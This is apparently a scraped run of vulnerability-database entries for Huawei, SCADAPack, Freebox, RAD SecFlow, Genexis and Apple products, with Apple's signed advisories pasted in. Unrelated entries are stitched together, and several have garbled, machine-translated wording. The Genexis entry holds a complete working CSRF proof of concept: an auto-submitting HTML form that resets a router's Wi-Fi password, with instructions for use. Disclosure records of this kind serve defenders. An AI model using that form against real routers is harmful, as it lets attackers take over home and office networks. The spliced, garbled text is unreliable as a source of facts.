Taurus-AN00B versions earlier than 10.1.0.156(C00E155R7P2) have a use-after-free (UAF) vulnerability. An authenticated, local attacker may perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service. Huawei Taurus-AL00B is a smart phone of China's Huawei (Huawei) company. Some Huawei phones have resource management errors. The vulnerability stems from use-after-free (UAF), which can be exploited by attackers to increase privileges and affect services

A CWE-285 Improper Authorization vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows improper access to executable code folders. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions. An attacker can use this vulnerability to gain incorrect access to the folder

A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3. Freebox Server Contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. The Freebox server is a DSL modem, router, Wi-Fi hotspot, NAS (250 GB hard disk), DECT base with up to 8 connected DECT phones, and digital video recorder-T for TNT (also known as DVB) And IPTV. There is a cross-site request forgery vulnerability in Freebox Server versions prior to 4.2.3, which is caused by the WEB application not fully verifying whether the request comes from a trusted user. An attacker can use this vulnerability to send unexpected requests to the server through the affected client

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF # Date: 28-08-2020 # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/ # Version: v2.1 (software version P4410-V2-1.28) # CVE : CVE-2020-25015 1. 2. 3. Proof of Concept Create an HTML file with the following code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST"> <input type="hidden" name="wlEnbl" value="ON" /> <input type="hidden" name="hwlKeys0" value="" /> <input type="hidden" name="hwlKeys1" value="" /> <input type="hidden" name="hwlKeys2" value="" /> <input type="hidden" name="hwlKeys3" value="" /> <input type="hidden" name="hwlgMode" value="9" /> <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" /> <input type="hidden" name="hwlEnbl" value="1" /> <input type="hidden" name="hWPSMode" value="1" /> <input type="hidden" name="henableSsid" value="1" /> <input type="hidden" name="hwlHide" value="0" /> <input type="hidden" name="isInWPSing" value="0" /> <input type="hidden" name="WpsConfModeAll" value="7" /> <input type="hidden" name="WpsConfModeNone" value="0" /> <input type="hidden" name="hWpsStart" value="0" /> <input type="hidden" name="isCUCSupport" value="0" /> <input type="hidden" name="SSIDPre" value="N&#47;A" /> <input type="hidden" name="bwControlhidden" value="0" /> <input type="hidden" name="ht&#95;bw" value="1" /> <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" /> <input type="hidden" name="wlChannel" value="0" /> <input type="hidden" name="wlTxPwr" value="1" /> <input type="hidden" name="wlSsidIdx" value="0" /> <input type="hidden" name="SSID&#95;Flag" value="0" /> <input type="hidden" name="wlSsid" value="JINSON" /> <input type="hidden" name="wlMcs" value="33" /> <input type="hidden" name="bwControl" value="1" /> <input type="hidden" name="giControl" value="1" /> <input type="hidden" name="enableSsid" value="on" /> <input type="hidden" name="wlAssociateNum" value="32" /> <input type="hidden" name="wlSecurMode" value="WPAand11i" /> <input type="hidden" name="wlPreauth" value="off" /> <input type="hidden" name="wlNetReauth" value="1" /> <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" /> <input type="hidden" name="cb&#95;enablshowpsw" value="on" /> <input type="hidden" name="wlWpaGtkRekey" value="" /> <input type="hidden" name="wlRadiusIPAddr" value="" /> <input type="hidden" name="wlRadiusPort" value="" /> <input type="hidden" name="wlRadiusKey" value="" /> <input type="hidden" name="wlWpa" value="TKIPAES" /> <input type="hidden" name="wlKeyBit" value="64" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="wlKeys" value="" /> <input type="hidden" name="WpsActive" value="0" /> <input type="hidden" name="wpsmode" value="ap&#45;pbc" /> <input type="hidden" name="pinvalue" value="" /> <input type="hidden" name="Save&#95;Flag" value="1" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD 4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title 3. Timeline Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020

A vulnerability in the web-based management interface of RAD SecFlow-1v os-image SF_0290_2.3.01.26 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. RAD SecFlow-1v Contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

A CWE-284 Improper Access Control vulnerability exists in SCADAPack 7x Remote Connect (V3.6.3.574 and prior) which allows an attacker to place executables in a specific folder and run code whenever RemoteConnect is executed by the user. SCADAPack 7x Remote Connect Contains an unspecified vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. SCADAPack is an intelligent field controller of French Schneider-electric. The controller combines the monitoring and communication capabilities of remote terminal control (RTU), the processing and data recording functions of programmable logic controllers (PLC). Remote process monitoring and autonomous control provide excellent functions

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. An attacker could exploit this vulnerability to cause an unexpected system termination or write to kernel memory. Apple iOS and iPadOS could allow a remote malicious user to execute arbitrary code on the system, caused by an out-of-bounds read in the Model I/O component. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0 iOS 14.0 and iPadOS 14.0 are now available and address the following: AppleAVD Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: An application may be able to cause unexpected system termination or write kernel memory Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9958: Mohamed Ghannam (@_simo36) Assets Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: An attacker may be able to misuse a trust relationship to download malicious content Description: A trust issue was addressed by removing a legacy API. CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs Icons Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: A malicious application may be able to identify what other applications a user has installed Description: The issue was addressed with improved handling of icon caches. CVE-2020-9773: Chilik Tamir of Zimperium zLabs IDE Device Support Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network Description: This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen IOSurfaceAccelerator Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03) Keyboard Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: A malicious application may be able to leak sensitive user information Description: A logic issue was addressed with improved state management. CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany Model I/O Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-9973: Aleksandar Nikolic of Cisco Talos Phone Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: The screen lock may not engage after the specified time period Description: This issue was addressed with improved checks. CVE-2020-9946: Daniel Larsson of iolight AB Sandbox Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: A malicious application may be able to access restricted files Description: A logic issue was addressed with improved restrictions. CVE-2020-9968: Adam Chester(@xpn) of TrustedSec Siri Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: A person with physical access to an iOS device may be able to view notification contents from the lockscreen Description: A lock screen issue allowed access to messages on a locked device. CVE-2020-9959: an anonymous researcher, an anonymous researcher, an anonymous researcher, an anonymous researcher, an anonymous researcher, Andrew Goldberg The University of Texas at Austin, McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan Gulguler WebKit Available for: iPhone 6s and later, iPod touch 7th generation, iPad Air 2 and later, and iPad mini 4 and later Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: An input validation issue was addressed with improved input validation. CVE-2020-9952: Ryan Pickren (ryanpickren.com) Additional recognition App Store We would like to acknowledge Giyas Umarov of Holmdel High School for their assistance. Bluetooth We would like to acknowledge Andy Davis of NCC Group and Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their assistance. CallKit We would like to acknowledge Federico Zanetello for their assistance. CarPlay We would like to acknowledge an anonymous researcher for their assistance. Core Location We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. debugserver We would like to acknowledge Linus Henze (pinauten.de) for their assistance. iAP We would like to acknowledge Andy Davis of NCC Group for their assistance. iBoot We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. libarchive We would like to acknowledge Dzmitry Plotnikau and an anonymous researcher for their assistance. Location Framework We would like to acknowledge an anonymous researcher for their assistance. Maps We would like to acknowledge Matthew Dolan of Amazon Alexa for their assistance. NetworkExtension We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo Song’ of ‘Symantec, a division of Broadcom’ for their assistance. Phone Keypad We would like to acknowledge an anonymous researcher for their assistance. Status Bar We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and an anonymous researcher for their assistance. Telephony We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. UIKit We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt, and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk Inc for their assistance. Web App We would like to acknowledge Augusto Alvarez of Outcourse Limited for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 14.0 and iPadOS 14.0". -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6 jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6 O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5 nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7 Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1 oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1 jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb 80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU= =7kDq -----END PGP SIGNATURE----- . Information about the security content is also available at https://support.apple.com/HT211849. CoreAudio Available for: macOS Catalina 10.15 Impact: Playing a malicious audio file may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative, JunDong Xie of Ant Group Light-Year Security Lab Entry added November 12, 2020 Find My Available for: macOS Catalina 10.15 Impact: A malicious application may be able to read sensitive location information Description: A file access issue existed with certain home folder files. CVE-2020-9981: found by OSS-Fuzz Entry added November 12, 2020 Mail Available for: macOS High Sierra 10.13.6 Impact: A remote attacker may be able to unexpectedly alter application state Description: This issue was addressed with improved checks. Installation note: macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxoYACgkQZcsbuWJ6 jjCHdw//WLFqNbXU96dGvxxomfbZOJcbQJZNR2IfaJdfgyh7tXDM0iQ6u3pYiaE4 6ChayI2VZ7y0Aq0X8PkuIOCbin++/moGLuGrIEOYHaA9aiohD+YX9WMcKrk55B1K LBhZ9bBz2gPBzOUhVO63XW7nspS9tzhL+nyt1q4WeLbcYaLvEdV1ZJyrtQ7aBw1D RKFTKKxvOTgo+EdTq67zqWQNkTLdaz1Ls1NonDCVnd/p4M10Aa6iCUyA/q2OZFEL dmHAab1m+RBtkMCBaOXLlxQ09aBrBsJPQFRq0bH5btR1Od4GHyA+eXBmOLCggrM1 f64jsg/m9E+XgZ0OcBQ9X5Yh4kyBKw00EORGuSREAlvXl2WD87GlQzUpa53aMFf/ TjVEG79nWEWzxzNDFRPq6PXLrdbEUFizEEw0FffNPi4KjykntKtnQFJoqZiiWsSM Zmx7TI83KAdDYLusw5RYGhTb2fpfQKHLENnRpYvPC+b+pCyu+6RJC+mxHY2W9iAS K/yULJhphnQWyLO7kiiqLD1t77CDTUXNneei4WpS+L3SA7EjdcyLt/CZv4pBD2n1 /4RZXacoP1D7GabKK0DOB3tZHRqOuWa24NlkK3IzuejJJCbVhtji1yex7wU6gTW+ GEvH223424RO/8Kssd0/cgGfXQszDQLxZZIzooEUjxVcQ7tkxaI= =QB9p -----END PGP SIGNATURE-----